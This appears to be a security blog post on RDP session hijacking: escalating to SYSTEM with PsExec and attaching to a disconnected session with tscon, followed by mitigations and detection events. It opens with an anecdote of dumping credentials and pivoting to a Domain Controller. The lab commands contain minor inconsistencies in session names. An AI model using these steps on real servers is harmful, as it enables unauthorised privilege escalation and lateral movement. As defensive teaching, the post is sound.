I was poking around on a routine scan—purely for educational reasons 😇—when one IT staffer’s workstation practically invited me in.
A quick credential dump landed me local-admin, and there they were: six RDP sessions quietly ticking away because he never hits Sign out.
This “pivot” user had connections to half the company’s servers, so one tscon dropped me straight onto the Domain Controller.
All that risk, born from a single habit: closing the window instead of logging off.
Before we dive into the technical walkthrough, let’s recap why a dangling RDP session is even a thing
1. Background
Remote Desktop Protocol (RDP) spawns a user session on the target server.
If you log off, that session is destroyed.
If you merely close the RDP client, the session flips to Disconnected (Disc) and sits in RAM—programs keep running, credentials stay cached.
On Windows Server 2016 and earlier, tscon.exe allows a process running as NT AUTHORITY\SYSTEM to attach to any live session without knowing its password.
2. Lab Walk‑through: Hijacking a Disconnected Session
2.1 – Enumerate & understand your current role
2.2 – Elevate to SYSTEM
# run an elevated cmd *as Administrator*
C:\tools\PsExec64.exe -s cmd.exe
-s ▸ launches the new cmd.exe as SYSTEM.
2.3 – List RDP sessions
C:\> query user
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>administrator rdp-tcp#6 2 Active . 04/01/2022 04:09
DC 3 Disc . 04/06/2022 06:51
-
administrator(you) is Active on session 2. - Session 3 is in Disc state—perfect target.
2.4 – Steal X’s Session into the DC
tscon 3 /dest:rdp-tcp#6
-
3▸ the ID of X’s session.
-
/dest:rdp-tcp#41▸ your transport channel (seeSESSIONNAME).
The RDP window instantly flips to Domain Controller’s desktop, programs and all—no password prompt.
But on the bright side - they had a virtually uncrackable DC password.
3. Why This Is Dangerous
| Risk | Impact |
|---|---|
| Privilege escalation | Hijacker inherits the victim’s rights—often Domain Admin. |
| Silent lateral movement | No new logon events; looks like the legit user is still logged in. |
| Data exposure | Open Outlook, KeePass, RDP files—all ready for the taking. |
| Operational disruption | Hijacker can run ransomware as the victim, masking attribution. |
4. Mitigations & Best Practices
- Always *Log off—teach admins to hit **Start → Sign out*.
-
Idle Session Limits
GPO:
Computer Config → Policies → Admin Templates → Windows Components → Remote Desktop Services → Session Time Limits. Set “End a disconnected session” to e.g. 15 minutes. -
Deny
tsconHijack Server 2019+ prompts for the user’s password when attaching to another session. - Restrict SYSTEM Escalation Block or alert on PsExec/WMI with Defender ASR rule 56. Deploy AppLocker / WDAC to deny unsigned admin tools.
-
Monitor Event 7045 & 4778
Detect rogue service installs (
psexesvc) and unexpected session re‑connections. - MFA for Admin RDP Even if a token is hijacked, MFA blocks fresh privileged logons.
5. Server 2019 and Later
Server 2019/2022 changed tscon behaviour—SYSTEM can no longer attach to another user’s session without supplying that user’s credentials.
Still enforce log‑off discipline: the session keeps consuming RAM/CPU and may be exposed by future privilege‑escalation exploits.
6. Key Take‑aways
- Disconnect ≠ Log off—your session remains a loaded gun on the server.
- Attackers with SYSTEM can pull the trigger in one line of PowerShell or
tscon. - Good hygiene (log off), sensible timeouts, and modern hardening (ASR, WDAC) shut this door.
Stay safe, and make “Sign out” your new muscle memory! 🛡️
References
-
Microsoft Docs –
tsconcommand - Sysinternals PsExec
- [Mitre ATT&CK – T1563.002: Remote Services > RDP Hijacking](https://attack.mitre.org/techniques/T1563/002
*And as always, all of this was done safely in a lab environment. *
Top comments (0)